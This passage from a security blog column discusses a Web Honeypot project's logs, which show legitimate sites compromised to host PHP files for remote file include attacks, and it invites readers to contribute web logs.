But other information can be gleaned from the published data, as well. For example, I was looking through the "distinct URL list" and was able to identify numerous legitimate sites that had been compromised, including sports, church, and corporate Websites.
The most obvious trend I saw (after visiting a few of the URLs in the logs) was that most of the compromised sites are primarily Asian sites that host a text file containing PHP code. The attacks target remote "file include" vulnerabilities in PHP Web applications. These vulnerabilities, when exploited, accept files hosted on other servers and interpret them locally on the victim Web server in order to gain remote control of the application, or sometimes the Web server itself.
The Web Honeypot project has the potential to provide the security community with some very useful data on attack trends, but it needs volunteers to contribute Web logs. Take a look at the project's site for more information on how to contribute.
John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.